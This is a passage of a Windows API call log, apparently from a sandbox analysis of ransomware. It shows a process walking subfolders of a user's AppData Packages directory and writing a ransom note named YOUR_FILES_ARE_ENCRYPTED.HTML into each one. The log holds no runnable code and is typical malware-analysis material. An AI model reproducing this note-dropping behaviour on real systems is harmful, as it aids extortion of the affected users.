hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.832] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab58681a, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab58681a, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.832] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.832] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC") returned 88 [0121.832] GetProcessHeap () returned 0x600000 [0121.832] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.834] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC" [0121.834] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\*" [0121.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab58681a, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0121.838] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab58681a, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.838] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0121.838] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.838] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache") returned 98 [0121.838] GetProcessHeap () returned 0x600000 [0121.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.839] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache" [0121.839] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache\\*" [0121.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.841] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 1 [0121.841] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 0 [0121.841] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.841] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0121.841] GetProcessHeap () returned 0x600000 [0121.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.842] WriteFile (in: hFile=0x338, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.843] CloseHandle (hObject=0x338) returned 1 [0121.843] GetProcessHeap () returned 0x600000 [0121.843] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.843] GetProcessHeap () returned 0x600000 [0121.843] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.843] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0121.843] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.843] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies") returned 100 [0121.843] GetProcessHeap () returned 0x600000 [0121.843] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.843] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies" [0121.843] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies\\*" [0121.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0121.844] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 1 [0121.844] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 0 [0121.844] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0121.844] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0121.844] GetProcessHeap () returned 0x600000 [0121.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.845] WriteFile (in: hFile=0x338, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.845] CloseHandle (hObject=0x338) returned 1 [0121.846] GetProcessHeap () returned 0x600000 [0121.846] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.846] GetProcessHeap () returned 0x600000 [0121.846] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.846] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0121.846] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.846] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory") returned 100 [0121.846] GetProcessHeap () returned 0x600000 [0121.846] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.846] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory" [0121.846] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory\\*" [0121.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.846] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 1 [0121.846] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 0 [0121.846] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.846] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0121.846] GetProcessHeap () returned 0x600000 [0121.846] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.847] WriteFile (in: hFile=0x338, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.848] CloseHandle (hObject=0x338) returned 1 [0121.848] GetProcessHeap () returned 0x600000 [0121.848] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.848] GetProcessHeap () returned 0x600000 [0121.848] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.848] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.848] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.848] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp") returned 93 [0121.848] GetProcessHeap () returned 0x600000 [0121.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.848] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp" [0121.848] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp\\*" [0121.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.848] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 1 [0121.848] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dae58, dwReserved1=0x3188418, cFileName="..", cAlternateFileName="")) returned 0 [0121.848] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.848] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.848] GetProcessHeap () returned 0x600000 [0121.849] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.849] WriteFile (in: hFile=0x338, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.850] CloseHandle (hObject=0x338) returned 1 [0121.850] GetProcessHeap () returned 0x600000 [0121.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.850] GetProcessHeap () returned 0x600000 [0121.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.851] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab6b791d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab6b791d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab6b791d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="Temp", cAlternateFileName="")) returned 0 [0121.851] FindClose (in: hFindFile=0x6268f8 | out: 